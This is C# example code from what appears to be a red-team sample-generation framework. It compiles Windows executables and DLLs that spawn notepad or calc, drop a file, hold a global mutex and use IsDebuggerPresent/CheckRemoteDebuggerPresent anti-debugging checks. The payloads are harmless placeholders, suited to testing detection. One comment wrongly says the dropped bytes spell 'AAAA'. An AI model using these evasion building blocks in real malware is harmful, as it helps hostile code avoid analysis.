// Constructing a large C/C++ Example
private static IAttack LargeCCxxExample()
{
var samplesOutput = new SamplesOutput();
var attackName = "LargeCCxx";
var attack = new Attack(new IOutput[] {
samplesOutput,
}, name: attackName);
// spawn notepad
var createProcessSource1 = new CreateProcess("notepad");
// spawn calc
var createProcessSource2 = new CreateProcess("calc");
// returns the we specified path
var targetPathSource = new StaticTargetPathCCxxSource(@"C:\Users\Public\baby.txt");
// returns the data we specified
var fileResourceSource = new StaticFileResourceCCxxSource(new byte[] { 0x65, 0x65, 0x65, 0x65 });
// Drop a file to disk (drop the file "C:\Users\Public\baby.txt" to disk with contents "AAAA")
var writeFileSource = new WriteFileResourceCCxxSource <StaticTargetPathCCxxSource, StaticFileResourceCCxxSource>(targetPathSource, fileResourceSource);
// Call a series C functions in order
var functionCallsSource = new SequentialFunctionCallCCxxSource(new IParameterlessCFunction[] { createProcessSource1, writeFileSource });
// Limit to at most 1 running instance of this code at a time by creating a Global mutex. Only 1 process can have an open handle to a global mutex at a time
var mutexSource = new MutexSingletonCCxxSource(functionCallsSource, mutexName: @"Global\SomeMutexName");
// Check a conditional statement, (check if a debugger is attached)
var antidebuggerSource1 = new NotIsDebuggerPresentCCxxSource(); // Returns true if it's safe to execute (No debugger is attached)
var antidebuggerSource2 = new RemoteDebuggerCCxxSource(); // Retruns true if it's safe to execute (No debugger is attached)
var ifElseSource = new IfElseFunctionCallCCxxSource(
"{0} && {1}", // If this boolean expression is true
new IParameterlessCFunction[] { antidebuggerSource1, antidebuggerSource2 },
trueCaseFunction: mutexSource, // Then execute this
falseCaseFunction: createProcessSource2); // Otherwise execute this
var createThreadSource = new CreateThreadCCxxSource(ifElseSource); // Create a new thread and execute this
var exeWinMainSource = new FunctionCallExeWinMainCCxxSource(createThreadSource);
var exeSource = exeWinMainSource;
// Summary,
// In the main function (WinMain),
// Create a thread
// In the new thread, Check if a debugger is present using the IsDebuggerPresent technique and the CheckRemoteDebuggerPresent technique
// If a debugger is attached,
// spawn calc
// Else // debuger is not attached
// create a mutex. If the mutex is free,
// Spawn notepad
// Drop C:\Users\Public\baby.txt to disk
var createProcessExeStaticLibrary = ((ICCxxCompiler <Win64ObjectFile>) new MyWarez.Plugins.Msvc.Compiler()).Compile(exeSource);
var createProcessExe = ((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.Msvc.Linker()).Link(createProcessExeStaticLibrary);
samplesOutput.Add("LargeCCxx.exe", createProcessExe);
// Double click the to confirm that notepad spawns.
// Open the sample in WinDbg to confirm that calc spawns when a debugger is attached
attack.Generate();
return(attack);
}
// C/C++ with MSVC Example
private static IAttack CCxxMsvcExample()
{
var samplesOutput = new SamplesOutput();
var attackName = "CCxxMsvc";
var attack = new Attack(new IOutput[] {
samplesOutput,
}, name: attackName);
var cmdline = "notepad"; // any commandline
// CreateProcess is C/C++ code that will create a process using Kernel32!CreateProcessA
var createProcessSource = new CreateProcess(cmdline);
// FunctionCallExeWinMainCCxxSource is C/C++ code containing a template WinMain implentation that calls the inputs entry point function
var createProcessExeSource = new FunctionCallExeWinMainCCxxSource(createProcessSource);
// createProcessExeSource contains the code for WinMain AND the code to create a process from createProcessSource
// C/C++ code can be compiled using the MSVC toolchain
// StaticLibrary represents compiled code
// Msvc.Compiler accepts Msvc.Compiler.Config as an argument. If None is specifed, then the default is used. The default is good for the majority of cases
// (ICCxxCompiler<Win64ObjectFile>) means that this is a C/C++ Compiler that produces object files of type Win64ObjectFile (MSVC's object format for 64-bit code)
var createProcessExeStaticLibrary = ((ICCxxCompiler <Win64ObjectFile>) new MyWarez.Plugins.Msvc.Compiler()).Compile(createProcessExeSource);
// The Linker is used to create an executable using the compiled code from the compilation step
// Msvc.Linker accepts Msvc.Linker.Config as an argument. If None is specifed, then the default is used. The default is good for the majority of cases
// (ILinker<Win64ObjectFile, Executable>) means that this is a Linker that access object files of type Win64ObjectFile and produces executables of type Executable (.exe)
var createProcessExe = ((ILinker <Win64ObjectFile, Executable>) new MyWarez.Plugins.Msvc.Linker()).Link(createProcessExeStaticLibrary);
// The MSVC toolchain can also be used to create a DLL from C/C++ source
// CreateProcess implements the interface ICFunction. ICFunction represents a callable (using the C calling convention) function. The property "Name" of ICFunction is representative of the function's (unmangled) symbol name
var exportedFunctionName = ((ICFunction)createProcessSource).Name;
// DLLs can export functions for other programs to call
var createProcessDllSource = new SkeletonDllMainCCxxSource(createProcessSource, exportedFunctions: new[] { exportedFunctionName });
var createProcessDllStaticLibrary = ((ICCxxCompiler <Win64ObjectFile>) new MyWarez.Plugins.Msvc.Compiler()).Compile(createProcessDllSource);
// Msvc.Linker must be explictly told what function(s) to export
// (ILinker<Win64ObjectFile, Executable>) means that this is a Linker that access object files of type Win64ObjectFile and produces executables of type DynamicLinkLibrary (.dll)
var createProcessLinkerConfig = new MyWarez.Plugins.Msvc.Linker.Config(exportedFunctions: createProcessDllSource.ExportedFunctions);
var createProcessDll = ((ILinker <Win64ObjectFile, DynamicLinkLibrary>) new MyWarez.Plugins.Msvc.Linker(createProcessLinkerConfig)).Link(createProcessDllStaticLibrary);
samplesOutput.Add("CCxxMsvcNotepad.exe", createProcessExe); // Double click to confirm that notepad spawns
samplesOutput.Add("CCxxMsvcNotepad.dll", createProcessDll); // run: "rundll32 Sample8Notepad.dll,CreateProcessFunction" to confirm that notepad spawns
attack.Generate();
return(attack);
}
